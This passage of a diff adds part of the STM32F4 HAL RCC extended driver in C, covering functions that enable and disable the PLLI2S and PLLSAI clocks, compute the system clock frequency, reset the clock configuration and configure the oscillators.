+ * +@verbatim + =============================================================================== + ##### Extended clock management functions ##### + =============================================================================== + [..] + This subsection provides a set of functions allowing to control the + activation or deactivation of PLLI2S, PLLSAI. +@endverbatim + * @{ + */ + +#if defined(RCC_PLLI2S_SUPPORT) +/** + * @brief Enable PLLI2S. + * @param PLLI2SInit pointer to an RCC_PLLI2SInitTypeDef structure that + * contains the configuration information for the PLLI2S + * @retval HAL status + */ +HAL_StatusTypeDef HAL_RCCEx_EnablePLLI2S(RCC_PLLI2SInitTypeDef *PLLI2SInit) +{ + uint32_t tickstart; + + /* Check for parameters */ + assert_param(IS_RCC_PLLI2SN_VALUE(PLLI2SInit->PLLI2SN)); + assert_param(IS_RCC_PLLI2SR_VALUE(PLLI2SInit->PLLI2SR)); +#if defined(RCC_PLLI2SCFGR_PLLI2SM) + assert_param(IS_RCC_PLLI2SM_VALUE(PLLI2SInit->PLLI2SM)); +#endif /* RCC_PLLI2SCFGR_PLLI2SM */ +#if defined(RCC_PLLI2SCFGR_PLLI2SP) + assert_param(IS_RCC_PLLI2SP_VALUE(PLLI2SInit->PLLI2SP)); +#endif /* RCC_PLLI2SCFGR_PLLI2SP */ +#if defined(RCC_PLLI2SCFGR_PLLI2SQ) + assert_param(IS_RCC_PLLI2SQ_VALUE(PLLI2SInit->PLLI2SQ)); +#endif /* RCC_PLLI2SCFGR_PLLI2SQ */ + + /* Disable the PLLI2S */ + __HAL_RCC_PLLI2S_DISABLE(); + + /* Wait till PLLI2S is disabled */ + tickstart = HAL_GetTick(); + while(__HAL_RCC_GET_FLAG(RCC_FLAG_PLLI2SRDY) != RESET) + { + if((HAL_GetTick() - tickstart ) > PLLI2S_TIMEOUT_VALUE) + { + /* return in case of Timeout detected */ + return HAL_TIMEOUT; + } + } + + /* Configure the PLLI2S division factors */ +#if defined(STM32F446xx) + /* PLLI2S_VCO = f(VCO clock) = f(PLLI2S clock input) * (PLLI2SN/PLLI2SM) */ + /* I2SPCLK = PLLI2S_VCO / PLLI2SP */ + /* I2SQCLK = PLLI2S_VCO / PLLI2SQ */ + /* I2SRCLK = PLLI2S_VCO / PLLI2SR */ + __HAL_RCC_PLLI2S_CONFIG(PLLI2SInit->PLLI2SM, PLLI2SInit->PLLI2SN, \ + PLLI2SInit->PLLI2SP, PLLI2SInit->PLLI2SQ, PLLI2SInit->PLLI2SR); +#elif defined(STM32F412Zx) || defined(STM32F412Vx) || defined(STM32F412Rx) || defined(STM32F412Cx) ||\ + defined(STM32F413xx) || defined(STM32F423xx) + /* PLLI2S_VCO = f(VCO clock) = f(PLLI2S clock input) * (PLLI2SN/PLLI2SM)*/ + /* I2SQCLK = PLLI2S_VCO / PLLI2SQ */ + /* I2SRCLK = PLLI2S_VCO / PLLI2SR */ + __HAL_RCC_PLLI2S_CONFIG(PLLI2SInit->PLLI2SM, PLLI2SInit->PLLI2SN, \ + PLLI2SInit->PLLI2SQ, PLLI2SInit->PLLI2SR); +#elif defined(STM32F427xx) || defined(STM32F437xx) || defined(STM32F429xx) || defined(STM32F439xx) ||\ + defined(STM32F469xx) || defined(STM32F479xx) + /* PLLI2S_VCO = f(VCO clock) = f(PLLI2S clock input) * PLLI2SN */ + /* I2SQCLK = PLLI2S_VCO / PLLI2SQ */ + /* I2SRCLK = PLLI2S_VCO / PLLI2SR */ + __HAL_RCC_PLLI2S_SAICLK_CONFIG(PLLI2SInit->PLLI2SN, PLLI2SInit->PLLI2SQ, PLLI2SInit->PLLI2SR); +#elif defined(STM32F411xE) + /* PLLI2S_VCO = f(VCO clock) = f(PLLI2S clock input) * (PLLI2SN/PLLI2SM) */ + /* I2SRCLK = PLLI2S_VCO / PLLI2SR */ + __HAL_RCC_PLLI2S_I2SCLK_CONFIG(PLLI2SInit->PLLI2SM, PLLI2SInit->PLLI2SN, PLLI2SInit->PLLI2SR); +#else + /* PLLI2S_VCO = f(VCO clock) = f(PLLI2S clock input) x PLLI2SN */ + /* I2SRCLK = PLLI2S_VCO / PLLI2SR */ + __HAL_RCC_PLLI2S_CONFIG(PLLI2SInit->PLLI2SN, PLLI2SInit->PLLI2SR); +#endif /* STM32F446xx */ + + /* Enable the PLLI2S */ + __HAL_RCC_PLLI2S_ENABLE(); + + /* Wait till PLLI2S is ready */ + tickstart = HAL_GetTick(); + while(__HAL_RCC_GET_FLAG(RCC_FLAG_PLLI2SRDY) == RESET) + { + if((HAL_GetTick() - tickstart ) > PLLI2S_TIMEOUT_VALUE) + { + /* return in case of Timeout detected */ + return HAL_TIMEOUT; + } + } + + return HAL_OK; +} + +/** + * @brief Disable PLLI2S. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_RCCEx_DisablePLLI2S(void) +{ + uint32_t tickstart; + + /* Disable the PLLI2S */ + __HAL_RCC_PLLI2S_DISABLE(); + + /* Wait till PLLI2S is disabled */ + tickstart = HAL_GetTick(); + while(READ_BIT(RCC->CR, RCC_CR_PLLI2SRDY) != RESET) + { + if((HAL_GetTick() - tickstart) > PLLI2S_TIMEOUT_VALUE) + { + /* return in case of Timeout detected */ + return HAL_TIMEOUT; + } + } + + return HAL_OK; +} + +#endif /* RCC_PLLI2S_SUPPORT */ + +#if defined(RCC_PLLSAI_SUPPORT) +/** + * @brief Enable PLLSAI. + * @param PLLSAIInit pointer to an RCC_PLLSAIInitTypeDef structure that + * contains the configuration information for the PLLSAI + * @retval HAL status + */ +HAL_StatusTypeDef HAL_RCCEx_EnablePLLSAI(RCC_PLLSAIInitTypeDef *PLLSAIInit) +{ + uint32_t tickstart; + + /* Check for parameters */ + assert_param(IS_RCC_PLLSAIN_VALUE(PLLSAIInit->PLLSAIN)); + assert_param(IS_RCC_PLLSAIQ_VALUE(PLLSAIInit->PLLSAIQ)); +#if defined(RCC_PLLSAICFGR_PLLSAIM) + assert_param(IS_RCC_PLLSAIM_VALUE(PLLSAIInit->PLLSAIM)); +#endif /* RCC_PLLSAICFGR_PLLSAIM */ +#if defined(RCC_PLLSAICFGR_PLLSAIP) + assert_param(IS_RCC_PLLSAIP_VALUE(PLLSAIInit->PLLSAIP)); +#endif /* RCC_PLLSAICFGR_PLLSAIP */ +#if defined(RCC_PLLSAICFGR_PLLSAIR) + assert_param(IS_RCC_PLLSAIR_VALUE(PLLSAIInit->PLLSAIR)); +#endif /* RCC_PLLSAICFGR_PLLSAIR */ + + /* Disable the PLLSAI */ + __HAL_RCC_PLLSAI_DISABLE(); + + /* Wait till PLLSAI is disabled */ + tickstart = HAL_GetTick(); + while(__HAL_RCC_PLLSAI_GET_FLAG() != RESET) + { + if((HAL_GetTick() - tickstart ) > PLLSAI_TIMEOUT_VALUE) + { + /* return in case of Timeout detected */ + return HAL_TIMEOUT; + } + } + + /* Configure the PLLSAI division factors */ +#if defined(STM32F446xx) + /* PLLSAI_VCO = f(VCO clock) = f(PLLSAI clock input) * (PLLSAIN/PLLSAIM) */ + /* SAIPCLK = PLLSAI_VCO / PLLSAIP */ + /* SAIQCLK = PLLSAI_VCO / PLLSAIQ */ + /* SAIRCLK = PLLSAI_VCO / PLLSAIR */ + __HAL_RCC_PLLSAI_CONFIG(PLLSAIInit->PLLSAIM, PLLSAIInit->PLLSAIN, \ + PLLSAIInit->PLLSAIP, PLLSAIInit->PLLSAIQ, 0U); +#elif defined(STM32F469xx) || defined(STM32F479xx) + /* PLLSAI_VCO = f(VCO clock) = f(PLLSAI clock input) * PLLSAIN */ + /* SAIPCLK = PLLSAI_VCO / PLLSAIP */ + /* SAIQCLK = PLLSAI_VCO / PLLSAIQ */ + /* SAIRCLK = PLLSAI_VCO / PLLSAIR */ + __HAL_RCC_PLLSAI_CONFIG(PLLSAIInit->PLLSAIN, PLLSAIInit->PLLSAIP, \ + PLLSAIInit->PLLSAIQ, PLLSAIInit->PLLSAIR); +#else + /* PLLSAI_VCO = f(VCO clock) = f(PLLSAI clock input) x PLLSAIN */ + /* SAIQCLK = PLLSAI_VCO / PLLSAIQ */ + /* SAIRCLK = PLLSAI_VCO / PLLSAIR */ + __HAL_RCC_PLLSAI_CONFIG(PLLSAIInit->PLLSAIN, PLLSAIInit->PLLSAIQ, PLLSAIInit->PLLSAIR); +#endif /* STM32F446xx */ + + /* Enable the PLLSAI */ + __HAL_RCC_PLLSAI_ENABLE(); + + /* Wait till PLLSAI is ready */ + tickstart = HAL_GetTick(); + while(__HAL_RCC_PLLSAI_GET_FLAG() == RESET) + { + if((HAL_GetTick() - tickstart ) > PLLSAI_TIMEOUT_VALUE) + { + /* return in case of Timeout detected */ + return HAL_TIMEOUT; + } + } + + return HAL_OK; +} + +/** + * @brief Disable PLLSAI. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_RCCEx_DisablePLLSAI(void) +{ + uint32_t tickstart; + + /* Disable the PLLSAI */ + __HAL_RCC_PLLSAI_DISABLE(); + + /* Wait till PLLSAI is disabled */ + tickstart = HAL_GetTick(); + while(__HAL_RCC_PLLSAI_GET_FLAG() != RESET) + { + if((HAL_GetTick() - tickstart) > PLLSAI_TIMEOUT_VALUE) + { + /* return in case of Timeout detected */ + return HAL_TIMEOUT; + } + } + + return HAL_OK; +} + +#endif /* RCC_PLLSAI_SUPPORT */ + +/** + * @} + */ + +#if defined(STM32F446xx) +/** + * @brief Returns the SYSCLK frequency + * + * @note This function implementation is valid only for STM32F446xx devices. + * @note This function add the PLL/PLLR System clock source + * + * @note The system frequency computed by this function is not the real + * frequency in the chip. It is calculated based on the predefined + * constant and the selected clock source: + * @note If SYSCLK source is HSI, function returns values based on HSI_VALUE(*) + * @note If SYSCLK source is HSE, function returns values based on HSE_VALUE(**) + * @note If SYSCLK source is PLL or PLLR, function returns values based on HSE_VALUE(**) + * or HSI_VALUE(*) multiplied/divided by the PLL factors. + * @note (*) HSI_VALUE is a constant defined in stm32f4xx_hal_conf.h file (default value + * 16 MHz) but the real value may vary depending on the variations + * in voltage and temperature. + * @note (**) HSE_VALUE is a constant defined in stm32f4xx_hal_conf.h file (default value + * 25 MHz), user has to ensure that HSE_VALUE is same as the real + * frequency of the crystal used. Otherwise, this function may + * have wrong result. + * + * @note The result of this function could be not correct when using fractional + * value for HSE crystal. + * + * @note This function can be used by the user application to compute the + * baudrate for the communication peripherals or configure other parameters. + * + * @note Each time SYSCLK changes, this function must be called to update the + * right SYSCLK value. Otherwise, any configuration based on this function will be incorrect. + * + * + * @retval SYSCLK frequency + */ +uint32_t HAL_RCC_GetSysClockFreq(void) +{ + uint32_t pllm = 0U; + uint32_t pllvco = 0U; + uint32_t pllp = 0U; + uint32_t pllr = 0U; + uint32_t sysclockfreq = 0U; + + /* Get SYSCLK source -------------------------------------------------------*/ + switch (RCC->CFGR & RCC_CFGR_SWS) + { + case RCC_CFGR_SWS_HSI: /* HSI used as system clock source */ + { + sysclockfreq = HSI_VALUE; + break; + } + case RCC_CFGR_SWS_HSE: /* HSE used as system clock source */ + { + sysclockfreq = HSE_VALUE; + break; + } + case RCC_CFGR_SWS_PLL: /* PLL/PLLP used as system clock source */ + { + /* PLL_VCO = (HSE_VALUE or HSI_VALUE / PLLM) * PLLN + SYSCLK = PLL_VCO / PLLP */ + pllm = RCC->PLLCFGR & RCC_PLLCFGR_PLLM; + if(__HAL_RCC_GET_PLL_OSCSOURCE() != RCC_PLLSOURCE_HSI) + { + /* HSE used as PLL clock source */ + pllvco = (uint32_t) ((((uint64_t) HSE_VALUE * ((uint64_t) ((RCC->PLLCFGR & RCC_PLLCFGR_PLLN) >> RCC_PLLCFGR_PLLN_Pos)))) / (uint64_t)pllm); + } + else + { + /* HSI used as PLL clock source */ + pllvco = (uint32_t) ((((uint64_t) HSI_VALUE * ((uint64_t) ((RCC->PLLCFGR & RCC_PLLCFGR_PLLN) >> RCC_PLLCFGR_PLLN_Pos)))) / (uint64_t)pllm); + } + pllp = ((((RCC->PLLCFGR & RCC_PLLCFGR_PLLP) >> RCC_PLLCFGR_PLLP_Pos) + 1U) *2U); + + sysclockfreq = pllvco/pllp; + break; + } + case RCC_CFGR_SWS_PLLR: /* PLL/PLLR used as system clock source */ + { + /* PLL_VCO = (HSE_VALUE or HSI_VALUE / PLLM) * PLLN + SYSCLK = PLL_VCO / PLLR */ + pllm = RCC->PLLCFGR & RCC_PLLCFGR_PLLM; + if(__HAL_RCC_GET_PLL_OSCSOURCE() != RCC_PLLSOURCE_HSI) + { + /* HSE used as PLL clock source */ + pllvco = (uint32_t) ((((uint64_t) HSE_VALUE * ((uint64_t) ((RCC->PLLCFGR & RCC_PLLCFGR_PLLN) >> RCC_PLLCFGR_PLLN_Pos)))) / (uint64_t)pllm); + } + else + { + /* HSI used as PLL clock source */ + pllvco = (uint32_t) ((((uint64_t) HSI_VALUE * ((uint64_t) ((RCC->PLLCFGR & RCC_PLLCFGR_PLLN) >> RCC_PLLCFGR_PLLN_Pos)))) / (uint64_t)pllm); + } + pllr = ((RCC->PLLCFGR & RCC_PLLCFGR_PLLR) >> RCC_PLLCFGR_PLLR_Pos); + + sysclockfreq = pllvco/pllr; + break; + } + default: + { + sysclockfreq = HSI_VALUE; + break; + } + } + return sysclockfreq; +} +#endif /* STM32F446xx */ + +/** + * @} + */ + +/** + * @} + */ + +/** + * @brief Resets the RCC clock configuration to the default reset state. + * @note The default reset state of the clock configuration is given below: + * - HSI ON and used as system clock source + * - HSE, PLL, PLLI2S and PLLSAI OFF + * - AHB, APB1 and APB2 prescaler set to 1. + * - CSS, MCO1 and MCO2 OFF + * - All interrupts disabled + * @note This function doesn't modify the configuration of the + * - Peripheral clocks + * - LSI, LSE and RTC clocks + * @retval HAL status + */ +HAL_StatusTypeDef HAL_RCC_DeInit(void) +{ + uint32_t tickstart; + + /* Get Start Tick */ + tickstart = HAL_GetTick(); + + /* Set HSION bit to the reset value */ + SET_BIT(RCC->CR, RCC_CR_HSION); + + /* Wait till HSI is ready */ + while (READ_BIT(RCC->CR, RCC_CR_HSIRDY) == RESET) + { + if ((HAL_GetTick() - tickstart) > HSI_TIMEOUT_VALUE) + { + return HAL_TIMEOUT; + } + } + + /* Set HSITRIM[4:0] bits to the reset value */ + SET_BIT(RCC->CR, RCC_CR_HSITRIM_4); + + /* Get Start Tick */ + tickstart = HAL_GetTick(); + + /* Reset CFGR register */ + CLEAR_REG(RCC->CFGR); + + /* Wait till clock switch is ready */ + while (READ_BIT(RCC->CFGR, RCC_CFGR_SWS) != RESET) + { + if ((HAL_GetTick() - tickstart) > CLOCKSWITCH_TIMEOUT_VALUE) + { + return HAL_TIMEOUT; + } + } + + /* Get Start Tick */ + tickstart = HAL_GetTick(); + + /* Clear HSEON, HSEBYP and CSSON bits */ + CLEAR_BIT(RCC->CR, RCC_CR_HSEON | RCC_CR_HSEBYP | RCC_CR_CSSON); + + /* Wait till HSE is disabled */ + while (READ_BIT(RCC->CR, RCC_CR_HSERDY) != RESET) + { + if ((HAL_GetTick() - tickstart) > HSE_TIMEOUT_VALUE) + { + return HAL_TIMEOUT; + } + } + + /* Get Start Tick */ + tickstart = HAL_GetTick(); + + /* Clear PLLON bit */ + CLEAR_BIT(RCC->CR, RCC_CR_PLLON); + + /* Wait till PLL is disabled */ + while (READ_BIT(RCC->CR, RCC_CR_PLLRDY) != RESET) + { + if ((HAL_GetTick() - tickstart) > PLL_TIMEOUT_VALUE) + { + return HAL_TIMEOUT; + } + } + +#if defined(RCC_PLLI2S_SUPPORT) + /* Get Start Tick */ + tickstart = HAL_GetTick(); + + /* Reset PLLI2SON bit */ + CLEAR_BIT(RCC->CR, RCC_CR_PLLI2SON); + + /* Wait till PLLI2S is disabled */ + while (READ_BIT(RCC->CR, RCC_CR_PLLI2SRDY) != RESET) + { + if ((HAL_GetTick() - tickstart) > PLLI2S_TIMEOUT_VALUE) + { + return HAL_TIMEOUT; + } + } +#endif /* RCC_PLLI2S_SUPPORT */ + +#if defined(RCC_PLLSAI_SUPPORT) + /* Get Start Tick */ + tickstart = HAL_GetTick(); + + /* Reset PLLSAI bit */ + CLEAR_BIT(RCC->CR, RCC_CR_PLLSAION); + + /* Wait till PLLSAI is disabled */ + while (READ_BIT(RCC->CR, RCC_CR_PLLSAIRDY) != RESET) + { + if ((HAL_GetTick() - tickstart) > PLLSAI_TIMEOUT_VALUE) + { + return HAL_TIMEOUT; + } + } +#endif /* RCC_PLLSAI_SUPPORT */ + + /* Once PLL, PLLI2S and PLLSAI are OFF, reset PLLCFGR register to default value */ +#if defined(STM32F412Cx) || defined(STM32F412Rx) || defined(STM32F412Vx) || defined(STM32F412Zx) || defined(STM32F413xx) || \ + defined(STM32F423xx) || defined(STM32F446xx) || defined(STM32F469xx) || defined(STM32F479xx) + RCC->PLLCFGR = RCC_PLLCFGR_PLLM_4 | RCC_PLLCFGR_PLLN_6 | RCC_PLLCFGR_PLLN_7 | RCC_PLLCFGR_PLLQ_2 | RCC_PLLCFGR_PLLR_1; +#elif defined(STM32F410Tx) || defined(STM32F410Cx) || defined(STM32F410Rx) + RCC->PLLCFGR = RCC_PLLCFGR_PLLR_0 | RCC_PLLCFGR_PLLR_1 | RCC_PLLCFGR_PLLR_2 | RCC_PLLCFGR_PLLM_4 | RCC_PLLCFGR_PLLN_6 | RCC_PLLCFGR_PLLN_7 | RCC_PLLCFGR_PLLQ_0 | RCC_PLLCFGR_PLLQ_1 | RCC_PLLCFGR_PLLQ_2 | RCC_PLLCFGR_PLLQ_3; +#else + RCC->PLLCFGR = RCC_PLLCFGR_PLLM_4 | RCC_PLLCFGR_PLLN_6 | RCC_PLLCFGR_PLLN_7 | RCC_PLLCFGR_PLLQ_2; +#endif /* STM32F412Cx || STM32F412Rx || STM32F412Vx || STM32F412Zx || STM32F413xx || STM32F423xx || STM32F446xx || STM32F469xx || STM32F479xx */ + + /* Reset PLLI2SCFGR register to default value */ +#if defined(STM32F412Cx) || defined(STM32F412Rx) || defined(STM32F412Vx) || defined(STM32F412Zx) || defined(STM32F413xx) || \ + defined(STM32F423xx) || defined(STM32F446xx) + RCC->PLLI2SCFGR = RCC_PLLI2SCFGR_PLLI2SM_4 | RCC_PLLI2SCFGR_PLLI2SN_6 | RCC_PLLI2SCFGR_PLLI2SN_7 | RCC_PLLI2SCFGR_PLLI2SQ_2 | RCC_PLLI2SCFGR_PLLI2SR_1; +#elif defined(STM32F401xC) || defined(STM32F401xE) || defined(STM32F405xx) || defined(STM32F415xx) || defined(STM32F407xx) || defined(STM32F417xx) + RCC->PLLI2SCFGR = RCC_PLLI2SCFGR_PLLI2SN_6 | RCC_PLLI2SCFGR_PLLI2SN_7 | RCC_PLLI2SCFGR_PLLI2SR_1; +#elif defined(STM32F427xx) || defined(STM32F437xx) || defined(STM32F429xx) || defined(STM32F439xx) || defined(STM32F469xx) || defined(STM32F479xx) + RCC->PLLI2SCFGR = RCC_PLLI2SCFGR_PLLI2SN_6 | RCC_PLLI2SCFGR_PLLI2SN_7 | RCC_PLLI2SCFGR_PLLI2SQ_2 | RCC_PLLI2SCFGR_PLLI2SR_1; +#elif defined(STM32F411xE) + RCC->PLLI2SCFGR = RCC_PLLI2SCFGR_PLLI2SM_4 | RCC_PLLI2SCFGR_PLLI2SN_6 | RCC_PLLI2SCFGR_PLLI2SN_7 | RCC_PLLI2SCFGR_PLLI2SR_1; +#endif /* STM32F412Cx || STM32F412Rx || STM32F412Vx || STM32F412Zx || STM32F413xx || STM32F423xx || STM32F446xx */ + + /* Reset PLLSAICFGR register */ +#if defined(STM32F427xx) || defined(STM32F429xx) || defined(STM32F437xx) || defined(STM32F439xx) || defined(STM32F469xx) || defined(STM32F479xx) + RCC->PLLSAICFGR = RCC_PLLSAICFGR_PLLSAIN_6 | RCC_PLLSAICFGR_PLLSAIN_7 | RCC_PLLSAICFGR_PLLSAIQ_2 | RCC_PLLSAICFGR_PLLSAIR_1; +#elif defined(STM32F446xx) + RCC->PLLSAICFGR = RCC_PLLSAICFGR_PLLSAIM_4 | RCC_PLLSAICFGR_PLLSAIN_6 | RCC_PLLSAICFGR_PLLSAIN_7 | RCC_PLLSAICFGR_PLLSAIQ_2; +#endif /* STM32F427xx || STM32F429xx || STM32F437xx || STM32F439xx || STM32F469xx || STM32F479xx */ + + /* Disable all interrupts */ + CLEAR_BIT(RCC->CIR, RCC_CIR_LSIRDYIE | RCC_CIR_LSERDYIE | RCC_CIR_HSIRDYIE | RCC_CIR_HSERDYIE | RCC_CIR_PLLRDYIE); + +#if defined(RCC_CIR_PLLI2SRDYIE) + CLEAR_BIT(RCC->CIR, RCC_CIR_PLLI2SRDYIE); +#endif /* RCC_CIR_PLLI2SRDYIE */ + +#if defined(RCC_CIR_PLLSAIRDYIE) + CLEAR_BIT(RCC->CIR, RCC_CIR_PLLSAIRDYIE); +#endif /* RCC_CIR_PLLSAIRDYIE */ + + /* Clear all interrupt flags */ + SET_BIT(RCC->CIR, RCC_CIR_LSIRDYC | RCC_CIR_LSERDYC | RCC_CIR_HSIRDYC | RCC_CIR_HSERDYC | RCC_CIR_PLLRDYC | RCC_CIR_CSSC); + +#if defined(RCC_CIR_PLLI2SRDYC) + SET_BIT(RCC->CIR, RCC_CIR_PLLI2SRDYC); +#endif /* RCC_CIR_PLLI2SRDYC */ + +#if defined(RCC_CIR_PLLSAIRDYC) + SET_BIT(RCC->CIR, RCC_CIR_PLLSAIRDYC); +#endif /* RCC_CIR_PLLSAIRDYC */ + + /* Clear LSION bit */ + CLEAR_BIT(RCC->CSR, RCC_CSR_LSION); + + /* Reset all CSR flags */ + SET_BIT(RCC->CSR, RCC_CSR_RMVF); + + /* Update the SystemCoreClock global variable */ + SystemCoreClock = HSI_VALUE; + + /* Adapt Systick interrupt period */ + if(HAL_InitTick(uwTickPrio) != HAL_OK) + { + return HAL_ERROR; + } + else + { + return HAL_OK; + } +} + +#if defined(STM32F410Tx) || defined(STM32F410Cx) || defined(STM32F410Rx) || defined(STM32F446xx) || defined(STM32F469xx) || defined(STM32F479xx) || defined(STM32F412Zx) ||\ + defined(STM32F412Vx) || defined(STM32F412Rx) || defined(STM32F412Cx) || defined(STM32F413xx) || defined(STM32F423xx) +/** + * @brief Initializes the RCC Oscillators according to the specified parameters in the + * RCC_OscInitTypeDef. + * @param RCC_OscInitStruct pointer to an RCC_OscInitTypeDef structure that + * contains the configuration information for the RCC Oscillators. + * @note The PLL is not disabled when used as system clock. + * @note Transitions LSE Bypass to LSE On and LSE On to LSE Bypass are not + * supported by this API. User should request a transition to LSE Off + * first and then LSE On or LSE Bypass. + * @note Transition HSE Bypass to HSE On and HSE On to HSE Bypass are not + * supported by this API. User should request a transition to HSE Off + * first and then HSE On or HSE Bypass. + * @note This function add the PLL/PLLR factor management during PLL configuration this feature + * is only available in STM32F410xx/STM32F446xx/STM32F469xx/STM32F479xx/STM32F412Zx/STM32F412Vx/STM32F412Rx/STM32F412Cx devices + * @retval HAL status + */ +HAL_StatusTypeDef HAL_RCC_OscConfig(RCC_OscInitTypeDef *RCC_OscInitStruct) +{ + uint32_t tickstart, pll_config; + + /* Check Null pointer */ + if(RCC_OscInitStruct == NULL) + { + return HAL_ERROR; + } + + /* Check the parameters */ + assert_param(IS_RCC_OSCILLATORTYPE(RCC_OscInitStruct->OscillatorType)); + /*------------------------------- HSE Configuration ------------------------*/ + if(((RCC_OscInitStruct->OscillatorType) & RCC_OSCILLATORTYPE_HSE) == RCC_OSCILLATORTYPE_HSE) + { + /* Check the parameters */ + assert_param(IS_RCC_HSE(RCC_OscInitStruct->HSEState)); + /* When the HSE is used as system clock or clock source for PLL in these cases HSE will not disabled */ +#if defined(STM32F446xx) + if((__HAL_RCC_GET_SYSCLK_SOURCE() == RCC_CFGR_SWS_HSE) ||\ + ((__HAL_RCC_GET_SYSCLK_SOURCE() == RCC_CFGR_SWS_PLL) && ((RCC->PLLCFGR & RCC_PLLCFGR_PLLSRC) == RCC_PLLCFGR_PLLSRC_HSE)) ||\ + ((__HAL_RCC_GET_SYSCLK_SOURCE() == RCC_CFGR_SWS_PLLR) && ((RCC->PLLCFGR & RCC_PLLCFGR_PLLSRC) == RCC_PLLCFGR_PLLSRC_HSE))) +#else + if((__HAL_RCC_GET_SYSCLK_SOURCE() == RCC_CFGR_SWS_HSE) ||\ + ((__HAL_RCC_GET_SYSCLK_SOURCE() == RCC_CFGR_SWS_PLL) && ((RCC->PLLCFGR & RCC_PLLCFGR_PLLSRC) == RCC_PLLCFGR_PLLSRC_HSE))) +#endif /* STM32F446xx */ + { + if((__HAL_RCC_GET_FLAG(RCC_FLAG_HSERDY) != RESET) && (RCC_OscInitStruct->HSEState == RCC_HSE_OFF)) + { + return HAL_ERROR; + } + } + else + { + /* Set the new HSE configuration ---------------------------------------*/ + __HAL_RCC_HSE_CONFIG(RCC_OscInitStruct->HSEState); + + /* Check the HSE State */ + if((RCC_OscInitStruct->HSEState) != RCC_HSE_OFF) + { + /* Get Start Tick*/ + tickstart = HAL_GetTick(); + + /* Wait till HSE is ready */ + while(__HAL_RCC_GET_FLAG(RCC_FLAG_HSERDY) == RESET) + { + if((HAL_GetTick() - tickstart ) > HSE_TIMEOUT_VALUE) + { + return HAL_TIMEOUT; + } + } + } + else + { + /* Get Start Tick*/ + tickstart = HAL_GetTick(); + + /* Wait till HSE is bypassed or disabled */ + while(__HAL_RCC_GET_FLAG(RCC_FLAG_HSERDY) != RESET) + { + if((HAL_GetTick() - tickstart ) > HSE_TIMEOUT_VALUE) + { + return HAL_TIMEOUT; + } + } + } + } + } + /*----------------------------- HSI Configuration --------------------------*/ + if(((RCC_OscInitStruct->OscillatorType) & RCC_OSCILLATORTYPE_HSI) == RCC_OSCILLATORTYPE_HSI) + { + /* Check the parameters */ + assert_param(IS_RCC_HSI(RCC_OscInitStruct->HSIState)); + assert_param(IS_RCC_CALIBRATION_VALUE(RCC_OscInitStruct->HSICalibrationValue)); + + /* Check if HSI is used as system clock or as PLL source when PLL is selected as system clock */ +#if defined(STM32F446xx) + if((__HAL_RCC_GET_SYSCLK_SOURCE() == RCC_CFGR_SWS_HSI) ||\ + ((__HAL_RCC_GET_SYSCLK_SOURCE() == RCC_CFGR_SWS_PLL) && ((RCC->PLLCFGR & RCC_PLLCFGR_PLLSRC) == RCC_PLLCFGR_PLLSRC_HSI)) ||\ + ((__HAL_RCC_GET_SYSCLK_SOURCE() == RCC_CFGR_SWS_PLLR) && ((RCC->PLLCFGR & RCC_PLLCFGR_PLLSRC) == RCC_PLLCFGR_PLLSRC_HSI))) +#else + if((__HAL_RCC_GET_SYSCLK_SOURCE() == RCC_CFGR_SWS_HSI) ||\ + ((__HAL_RCC_GET_SYSCLK_SOURCE() == RCC_CFGR_SWS_PLL) && ((RCC->PLLCFGR & RCC_PLLCFGR_PLLSRC) == RCC_PLLCFGR_PLLSRC_HSI))) +#endif /* STM32F446xx */ + { + /* When HSI is used as system clock it will not disabled */ + if((__HAL_RCC_GET_FLAG(RCC_FLAG_HSIRDY) != RESET) && (RCC_OscInitStruct->HSIState != RCC_HSI_ON)) + { + return HAL_ERROR; + } + /* Otherwise, just the calibration is allowed */ + else + { + /* Adjusts the Internal High Speed oscillator (HSI) calibration value.*/ + __HAL_RCC_HSI_CALIBRATIONVALUE_ADJUST(RCC_OscInitStruct->HSICalibrationValue); + } + } + else + { + /* Check the HSI State */ + if((RCC_OscInitStruct->HSIState)!= RCC_HSI_OFF) + { + /* Enable the Internal High Speed oscillator (HSI). */ + __HAL_RCC_HSI_ENABLE(); + + /* Get Start Tick*/ + tickstart = HAL_GetTick(); + + /* Wait till HSI is ready */ + while(__HAL_RCC_GET_FLAG(RCC_FLAG_HSIRDY) == RESET) + { + if((HAL_GetTick() - tickstart ) > HSI_TIMEOUT_VALUE) + { + return HAL_TIMEOUT; + } + } + + /* Adjusts the Internal High Speed oscillator (HSI) calibration value.*/ + __HAL_RCC_HSI_CALIBRATIONVALUE_ADJUST(RCC_OscInitStruct->HSICalibrationValue); + } + else + { + /* Disable the Internal High Speed oscillator (HSI). */ + __HAL_RCC_HSI_DISABLE(); + + /* Get Start Tick*/ + tickstart = HAL_GetTick(); + + /* Wait till HSI is ready */ + while(__HAL_RCC_GET_FLAG(RCC_FLAG_HSIRDY) != RESET) + { + if((HAL_GetTick() - tickstart ) > HSI_TIMEOUT_VALUE) + { + return HAL_TIMEOUT; + } + } + } + } + } + /*------------------------------ LSI Configuration -------------------------*/ + if(((RCC_OscInitStruct->OscillatorType) & RCC_OSCILLATORTYPE_LSI) == RCC_OSCILLATORTYPE_LSI) + { + /* Check the parameters */ + assert_param(IS_RCC_LSI(RCC_OscInitStruct->LSIState)); + + /* Check the LSI State */ + if((RCC_OscInitStruct->LSIState)!= RCC_LSI_OFF) + { + /* Enable the Internal Low Speed oscillator (LSI). */ + __HAL_RCC_LSI_ENABLE(); + + /* Get Start Tick*/ + tickstart = HAL_GetTick(); + + /* Wait till LSI is ready */ + while(__HAL_RCC_GET_FLAG(RCC_FLAG_LSIRDY) == RESET) + { + if((HAL_GetTick() - tickstart ) > LSI_TIMEOUT_VALUE) + { + return HAL_TIMEOUT; + } + } + } + else + { + /* Disable the Internal Low Speed oscillator (LSI). */ + __HAL_RCC_LSI_DISABLE(); + + /* Get Start Tick*/ + tickstart = HAL_GetTick(); + + /* Wait till LSI is ready */ + while(__HAL_RCC_GET_FLAG(RCC_FLAG_LSIRDY) != RESET) + { + if((HAL_GetTick() - tickstart ) > LSI_TIMEOUT_VALUE) + { + return HAL_TIMEOUT; + } + } + } + } + /*------------------------------ LSE Configuration -------------------------*/ + if(((RCC_OscInitStruct->OscillatorType) & RCC_OSCILLATORTYPE_LSE) == RCC_OSCILLATORTYPE_LSE) + { + FlagStatus pwrclkchanged = RESET; + + /* Check the parameters */ + assert_param(IS_RCC_LSE(RCC_OscInitStruct->LSEState)); + + /* Update LSE configuration in Backup Domain control register */ + /* Requires to enable write access 